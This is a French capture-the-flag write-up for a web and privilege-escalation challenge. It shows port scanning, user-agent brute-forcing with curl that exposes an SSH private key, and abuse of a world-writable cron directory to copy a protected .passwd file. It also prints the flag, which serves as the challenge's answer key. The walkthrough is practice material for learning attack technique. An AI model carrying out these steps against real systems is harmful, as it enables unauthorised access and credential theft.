# WRITEUP WEB / THEFT IN BLACK
## Consignes :

```
Vous avez encore perdu les clés et vous allez vous faire engueuler par votre chef ; Celle-ci vous a redonné un nouvel exemplaire que vous ne devez pas perdre, mais d'abord, tâchez de les récupérer !

Comme vous avez décidé de quitter les men in black, volez-lui au passage le flag qui permet de désactiver le bouclier Arcnet.
Le flag à trouver est sous la forme suivante : fl@g{XXXXXXXX}.

`game194.marshack.fr`
```

## Pièce(s)  jointe(s) :

```
Néant
```

## Serveur :
```
Docker
```

## Points attribués :

```
30
```

## Hint :

```

```

## Flag :

```
fl@g{4ut0m4t10n_br34ks_th3_w0rld}
```


# writeup

A l’aide d’un utilitaire de scan de port (*nmap*), on peut voir que la machine ne dispose que de deux ports ouverts (parmi les 1000 premiers ports) :

```bash
$ nmap game194.marshack.fr
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-15 05:12 EST
Nmap scan report for game194.marshack.fr
Host is up (0.0071s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 4.64 seconds
```

N'ayant pas encore d'identifiants pour accéder au SSH, commençons par analyser le site web à l'url http://game194.marshack.fr.

![](images/image01.png)

Énumérons le site web afin de trouver des éléments qui ne seraient pas accessibles directement depuis la page d'accueil.

On peut tester dans un premier temps la présence du fichier robots.txt. 

![](images/image02.png)

On peut constater la présence d'un fichier html dans un répertoire non prédictible, regardons son contenu.

![](images/image03.png)

Cette note nous permet de nous aiguiller afin de "s'authentifier" sur le site et récupérer potentiellement une clé d'accès à SSH.

Il nous faut modifier le user-agent afin de prendre en compte le format attendu : Agent suivi d'une lettre comme le modèle Agent K.

En effectuant une boucle curl et en modifiant le user-agent dans le format « agent x » (casse non sensible), on obtient un retour plus complet du site qui nous transmet un message et la clé privée de l’agent o.

```bash
$ for v in a b c d e f g h i j k l m n o p q r s t u v w x y z; do curl game194.marshack.fr -A "Agent $v" >> result.txt; done
```

On peut ainsi retrouver la clé privé openSSH de l'Agent O dans le fichier result.txt.

```bash
$ cat result.txt 
HTTP/1.1 200 OK
Date: Wed, 15 Feb 2023 12:49:37 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Last-Modified: Wed, 27 Jul 2022 12:15:14 GMT
ETag: "290-5e4c85e863880"
Accept-Ranges: bytes
Content-Length: 656
Content-Type: text/html

<html>
        <head>
                <meta charset="utf-8">
        </head>
        <body>
                <p>Bonjour Agent O, pour la dernière fois, n'oubliez pas votre clé n'importe où ! Il s'agira de la dernière fois sinon nous devrons procéder à votre "retrait"</p>
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACBhZBpn93cw+et/UcU2OPOzssYP9ZFj0Ffs3mdNSQIf4wAAAJCC2M1FgtjN
RQAAAAtzc2gtZWQyNTUxOQAAACBhZBpn93cw+et/UcU2OPOzssYP9ZFj0Ffs3mdNSQIf4w
AAAEDZD6DQLCAYjs/aznVHSvljfUTzB5VgMsaO/9Pa9Xc02WFkGmf3dzD5639RxTY487Oy
xg/1kWPQV+zeZ01JAh/jAAAACG9AbWliLmZyAQIDBAU=
-----END OPENSSH PRIVATE KEY-----
```

Il ne nous reste plus qu'à enregistrer cette clé dans un fichier sur la machine attaquante et ensuite tenter de se connecter:

```bash
$ vi id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACBhZBpn93cw+et/UcU2OPOzssYP9ZFj0Ffs3mdNSQIf4wAAAJCC2M1FgtjN
RQAAAAtzc2gtZWQyNTUxOQAAACBhZBpn93cw+et/UcU2OPOzssYP9ZFj0Ffs3mdNSQIf4w
AAAEDZD6DQLCAYjs/aznVHSvljfUTzB5VgMsaO/9Pa9Xc02WFkGmf3dzD5639RxTY487Oy
xg/1kWPQV+zeZ01JAh/jAAAACG9AbWliLmZyAQIDBAU=
-----END OPENSSH PRIVATE KEY-----

$ chmod 600 id_rsa
$ ssh -i id_rsa o@game194.marshack.fr   
The authenticity of host 'game194.marshack.fr (game194.marshack.fr)' can't be established.
ED25519 key fingerprint is SHA256:Drc0HpBf+PKUFASa/XJB1wbz7hk8/XqlJKBkUYvakQw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'game194.marshack.fr' (ED25519) to the list of known hosts.
Linux c9dc03dbcd88 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

 Bonjour O, vous m'apporterez un café s'il vou plait K 

o@c9dc03dbcd88:~$
```

On a enfin un accès sur le serveur.

En commençant à énumérer la machine victime, on peut observer la présence d'un répertoire *tâches* dans le répertoire *home* de k qui est accessible en écriture à tous.

```bash
o@2f4d46f41295:/home/k$ ls -al
total 20
drwxr-xr-x 1 root k      20 Feb 15 09:12 .
drwxr-xr-x 1 root root   15 Feb 15 10:48 ..
-rw-r--r-- 1 root k     220 Feb 15 10:48 .bash_logout
-rw-r--r-- 1 root k    3526 Feb 15 10:48 .bashrc
-rw-r----- 1 root k      31 Feb 13 09:50 .passwd
-rw-r--r-- 1 root k     807 Feb 15 10:48 .profile
drwxr-xr-x 1 root k      46 Feb 15 09:12 santa
drwxr-x-wx 1 root k       6 Feb 15 14:38 taches
-rw-r--r-- 1 root k     206 Jul 27  2022 todolist
```

Il y a également une information importante dans le fichier todolist à propos de tâches planifiées.

```bash
o@2f4d46f41295:/home/k$ cat todolist 
- Vérifier qu'aucune invasion alien n'est en cours
- Ne pas oublier de flasher les enfants car ils ont appris la vérité sur le père noël
- Faire de O. mon esclave !
- Modifier mes tâches automatiques
```

Essayons de voir si il y a des tâches planifiées sur la machine .

```bash
o@c101ec9272cc:~$ cat /etc/crontab
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed


MAILTO=""
* * * * * k /home/k/taches/*
*/2 * * * * root sleep 30 && rm -Rf /home/k/taches/*

```

La tâche planifiée va exécuter l'ensemble des scripts qui seront présents dans le répertoire *tâches* en tant que k.
La deuxième tâche supprime les scripts créés dans *tâches* toutes les deux minutes.

On peut également observer la présence d'un fichier caché .passwd qui n'est accessible en lecture qu'à k.

On pourrait ainsi détourner la tâche planifiée en lui faisant exécuter un script sur lequel on aurait le contrôle.

Nous commençons par créer un répertoire dans /tmp accessible en lecture et écriture à tous et ensuite nous devons surveiller son contenu avec la commande `watch`.

```bash
mkdir /tmp/test

chmod 777 /tmp/test

cd /tmp/test

watch -n 5 ls -la /tmp/test
```

Il ne nous reste plus qu'à écrire notre script dans le répertoire **/home/k/tâche** permettant de copier le fichier .passwd et le rendre accessible en lecture à o.

```bash
cd /home/k/taches
o@2f4d46f41295:/home/k/taches$ echo "cp /home/k/.passwd /tmp/test/.passwd" > test.sh
o@2f4d46f41295:/home/k/taches$ echo "chmod 777 /tmp/test/.passwd" >> test.sh
o@2f4d46f41295:/home/k/taches$ chmod +x test.sh
```

Après quelques temps d’attente, le fichier .passwd est bien copié et nous est accessible en lecture. Ce fichier contient notre flag.

```bash
o@2f4d46f41295:/tmp$ cat /tmp/test/.passwd
fl@g{4ut0m4t10n_br34ks_th3_w0rld}
```

<!-- Review Taz : 20230322 -->